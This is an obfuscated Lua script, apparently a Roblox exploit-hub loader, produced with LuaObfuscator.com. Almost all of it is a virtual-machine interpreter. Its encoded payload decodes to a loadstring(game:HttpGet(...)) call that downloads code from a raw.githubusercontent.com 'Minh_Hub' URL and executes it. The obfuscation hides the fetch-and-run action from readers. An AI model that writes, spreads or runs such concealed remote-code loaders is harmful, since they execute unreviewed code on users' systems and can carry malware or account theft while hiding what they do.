--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v110=0;local v111;while true do if (v110==1) then return v111;end if (v110==0) then v111=v5(v84,v19);v19=nil;v110=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/(2^(v32-((1 + 1) -1))))%(2^(((v33-(2 -1)) -(v32-(1 -(0 + 0)))) + (2 -1))) ;return v85-(v85%((1497 -(282 + 595)) -(555 + 64))) ;else local v86=(933 -(857 + (1711 -(1523 + 114))))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and ((512 + 57) -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(1270 -(226 + (1161 -(32 + 85))))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -3 ;end end end local function v22() local v36=0 + (0 -0) ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + ((1309 -(87 + 263)) -(892 + 65)) );v18=v18 + 2 ;v36=2 -1 ;end if (v36==1) then return (v38 * (472 -216)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;return (v42 * (41190819 -24413603)) + (v41 * ((49151 -(802 + 150)) + 17337)) + (v40 * (1017 -761)) + v39 ;end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 -0)) then v46=1 + 0 ;v47=(v20(v45,1 + 0 ,792 -(201 + 571) ) * ((999 -((2828 -(1789 + 124)) + 82))^(90 -(824 -(745 + 21))))) + v44 ;v43=2 + 0 ;end if (v43==(2 + 0)) then v48=v20(v45,27 -6 ,1218 -(368 + 701 + 118) );v49=((v20(v45,72 -40 )==(860 -(814 + 45))) and  -(1 -0)) or (1 + 0) ;v43=3;end if ((0 -0)==v43) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==3) then if (v48==(791 -(368 + 423))) then if (v47==((0 -0) -0)) then return v49 * ((70 -52) -(10 + 8)) ;else local v112=0 -0 ;while true do if (v112==0) then v48=443 -(416 + 26) ;v46=0 -0 ;break;end end end elseif (v48==2047) then return ((v47==((12 + 1411) -(630 + 793))) and (v49 * ((1 + 0 + 0)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1461 -(145 + 293)) ) * (v46 + (v47/((6 -4)^(482 -(44 + 386))))) ;end end end local function v25(v50) local v51=1055 -(87 + 968) ;local v52;local v53;while true do if (v51==(703 -(376 + 325))) then v53={};for v91=4 -3 , #v52 do v53[v91]=v2(v1(v3(v52,v91,v91)));end v51=8 -5 ;end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -(15 -(9 + 5)) );v18=v18 + v50 ;v51=2;end if (v51==(0 -0)) then v52=nil;if  not v50 then v50=v23();if (v50==(376 -(85 + 291))) then return "";end end v51=1414 -((1712 -(243 + 1022)) + 966) ;end if (v51==(8 -5)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54==1) then v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v61=(function() return {};end)();for v93= #"<",v60 do local v94=(function() return 0 -0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v94==(1825 -(1195 + 629))) then if (v95== #".") then v96=(function() return v21()~=0 ;end)();elseif (v95==(2 -0)) then v96=(function() return v24();end)();elseif (v95== #"gha") then v96=(function() return v25();end)();end v61[v93]=(function() return v96;end)();break;end if ((241 -(187 + 54))==v94) then local v114=(function() return 0;end)();while true do if (0==v114) then v95=(function() return v21();end)();v96=(function() return nil;end)();v114=(function() return 1;end)();end if (v114==1) then v94=(function() return 781 -(162 + 618) ;end)();break;end end end end end v54=(function() return 2 + 0 ;end)();end if (v54==(2 + 0)) then v59[ #"xnx"]=(function() return v21();end)();for v97= #"|",v23() do local v98=(function() return v21();end)();if (v20(v98, #",", #".")~=(0 -0)) then else local v106=(function() return 0;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106~=(1 -0)) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(1636 -(1373 + 263))) then local v122=(function() return 1000 -(451 + 549) ;end)();local v123=(function() return;end)();while true do if ((0 + 0)~=v122) then else v123=(function() return 0 -0 ;end)();while true do if (v123~=(0 -0)) then else v109[ #"-19"]=(function() return v22();end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"[") then v109[ #"19("]=(function() return v23();end)();elseif (v107==(1386 -(746 + 638))) then v109[ #"-19"]=(function() return v23() -(2^(7 + 9)) ;end)();elseif (v107== #"xxx") then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187~=0) then else v188=(function() return 0;end)();while true do if (v188==(0 -0)) then v109[ #"xnx"]=(function() return v23() -(2^16) ;end)();v109[ #"0313"]=(function() return v22();end)();break;end end break;end end end v106=(function() return 2;end)();end if (v106~=2) then else if (v20(v108, #"]", #"[")~= #"/") then else v109[2]=(function() return v61[v109[343 -(218 + 123) ]];end)();end if (v20(v108,2,2)~= #" ") then else v109[ #"19("]=(function() return v61[v109[ #"-19"]];end)();end v106=(function() return 1584 -(1535 + 46) ;end)();end if (v106==(0 + 0)) then local v120=(function() return 0 + 0 ;end)();while true do if (v120==1) then v106=(function() return 1;end)();break;end if (0==v120) then v107=(function() return v20(v98,562 -(306 + 254) , #"gha");end)();v108=(function() return v20(v98, #"http",6);end)();v120=(function() return 1 + 0 ;end)();end end end if (v106~=3) then else if (v20(v108, #"gha", #"xnx")== #"/") then v109[ #"xnxx"]=(function() return v61[v109[ #"http"]];end)();end v56[v97]=(function() return v109;end)();break;end end end end for v99= #":",v23() do v57,v99,v28=(function() return v55(v57,v99,v28);end)();end return v59;end if (v54~=(0 -0)) then else local v90=(function() return 0;end)();while true do if (v90~=(1468 -(899 + 568))) then else v57=(function() return {};end)();v58=(function() return {};end)();v90=(function() return 2;end)();end if (v90~=(2 + 0)) then else v54=(function() return 2 -1 ;end)();break;end if (0==v90) then v55=(function() return function(v115,v116,v117) local v118=(function() return 603 -(268 + 335) ;end)();local v119=(function() return;end)();while true do if (0==v118) then v119=(function() return 0;end)();while true do if (v119==0) then local v151=(function() return 0;end)();while true do if (v151~=0) then else local v189=(function() return 290 -(60 + 230) ;end)();while true do if (v189~=0) then else v115[v116-#"]" ]=(function() return v117();end)();return v115,v116,v117;end end end end end end break;end end end;end)();v56=(function() return {};end)();v90=(function() return 1;end)();end end end end end local function v29(v62,v63,v64) local v65=v62[573 -(264 + 162 + (1284 -(782 + 356))) ];local v66=v62[(268 -(176 + 91)) + 1 ];local v67=v62[1459 -((734 -452) + (3072 -(260 + 1638))) ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=812 -(569 + 242) ;local v73= -(2 -1);local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v87=1024 -(706 + 318) ,v76 do if (((983<1808) and (v87>=v70)) or (876>=2964)) then v74[v87-v70 ]=v75[v87 + ((1844 -592) -(721 + 530)) ];else v78[v87]=v75[v87 + (1272 -(945 + 326)) ];end end local v79=(v76-v70) + (1552 -((1566 -(382 + 58)) + (1517 -(975 + 117)))) ;local v80;local v81;while true do local v88=405 -(118 + 287) ;while true do if (v88==(2 -1)) then if ((v81<=(3 + 0)) or (2150<=1197)) then if ((v81<=(701 -(271 + (2304 -(157 + 1718))))) or (2232>2497)) then if (v81==(0 + 0)) then v78[v80[1502 -(1408 + 92) ]]=v64[v80[(3493 -2404) -(461 + 625) ]];else v78[v80[1290 -(993 + 295) ]]={};end elseif (v81>(1 + 0 + (3 -2))) then local v130=(0 + 0) -0 ;local v131;local v132;local v133;local v134;local v135;while true do if (v130==(1180 -(418 + 753))) then do return;end break;end if (v130==(3 + 4)) then v80=v68[v72];v135=v80[1 + 1 ];v78[v135]=v78[v135](v13(v78,v135 + (978 -(553 + 424)) ,v73));v72=v72 + (1 -0) ;v130=(10 -7) + 5 ;end if ((3769>=1173) and (v130==((1 -0) + 2))) then v80=v68[v72];v135=v80[531 -(406 + (1141 -(697 + 321))) ];v134=v78[v80[3]];v78[v135 + 1 + 0 ]=v134;v130=1773 -(1749 + 20) ;end if (v130==2) then v72=v72 + (2 -1) + 0 ;v80=v68[v72];v78[v80[1324 -((2645 -1396) + 73) ]]=v64[v80[6 -3 ]];v72=v72 + 1 + 0 ;v130=(5 -3) + 1 ;end if (v130==(1150 -(466 + 679))) then v72=v72 + ((4 -2) -1) ;v80=v68[v72];v135=v80[1 + 1 ];v132,v133=v71(v78[v135](v13(v78,v135 + 1 ,v80[8 -5 ])));v130=1906 -(106 + 1794) ;end if ((v130==(3 + 5)) or (2110<=332)) then v80=v68[v72];v78[v80[(1206 -(902 + 303)) + 1 ]]();v72=v72 + ((1 + 1) -1) ;v80=v68[v72];v130=3 + 6 ;end if ((3686>3172) and (((0 -0) -0)==v130)) then v131=nil;v132,v133=nil;v134=nil;v135=nil;v130=1131 -(369 + 761) ;end if ((1485==1485) and (v130==((2 -1) + 0))) then v78[v80[5 -3 ]]={};v72=v72 + (1 -0) ;v80=v68[v72];v78[v80[116 -((8 -4) + (264 -154)) ]]=v64[v80[1 + 2 ]];v130=(51 + 535) -((1747 -(1121 + 569)) + 527) ;end if (v130==(1433 -(41 + 1386))) then v73=(v133 + v135) -(337 -(144 + 192)) ;v131=(1330 -(322 + 905)) -(17 + (300 -(22 + 192))) ;for v182=v135,v73 do v131=v131 + 1 + 0 ;v78[v182]=v132[v131];end v72=v72 + (1 -0) ;v130=20 -13 ;end if ((v130==(1508 -((1046 -(483 + 200)) + 1141))) or (4474<820)) then v78[v135]=v134[v80[(1633 -(1404 + 59)) -(122 + 44) ]];v72=v72 + (1 -0) ;v80=v68[v72];v78[v80[6 -4 ]]=v80[3 + 0 ];v130=(2 -1) + (4 -0) ;end end else local v136=0 -0 ;local v137;while true do if (v136==(65 -(30 + 35))) then v137=v80[1977 -(1913 + 62) ];v78[v137]=v78[v137](v13(v78,v137 + 1 + 0 ,v73));break;end end end elseif ((4279>=2882) and (v81<=(1262 -(1043 + 214)))) then if (v81>((780 -(468 + 297)) -11)) then local v138=v80[1214 -(323 + 889) ];local v139,v140=v71(v78[v138](v13(v78,v138 + (563 -(334 + 228)) ,v80[7 -4 ])));v73=(v140 + v138) -(581 -(361 + 219)) ;local v141=320 -(53 + (900 -633)) ;for v147=v138,v73 do v141=v141 + 1 + 0 ;v78[v147]=v139[v141];end else local v142=0 -0 ;local v143;local v144;while true do if (v142==(413 -(15 + 398))) then v143=v80[858 -(564 + 292) ];v144=v78[v80[4 -(612 -(602 + 9)) ]];v142=983 -(18 + 964) ;end if (v142==(3 -(1191 -(449 + 740)))) then v78[v143 + (2 -1) ]=v144;v78[v143]=v144[v80[(1180 -(826 + 46)) -((1191 -(245 + 702)) + 60) ]];break;end end end elseif ((v81<=(4 + (6 -4))) or (3315<=2782)) then v78[v80[2 + (0 -0) ]]=v80[479 -(41 + (788 -353)) ];elseif (v81==(857 -(20 + 830))) then v78[v80[2 + 0 ]]();else do return;end end v72=v72 + (127 -(116 + 10)) ;break;end if ((v88==(0 + 0)) or (2029>=3521)) then v80=v68[v72];v81=v80[739 -(542 + 196) ];v88=(1 + 0) -(236 -(141 + 95)) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403533Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4D696E682D636F6465303830372F4D696E685F4875622F726566732F68656164732F6D61696E2F42612Q6C2532302Q6D3200094Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
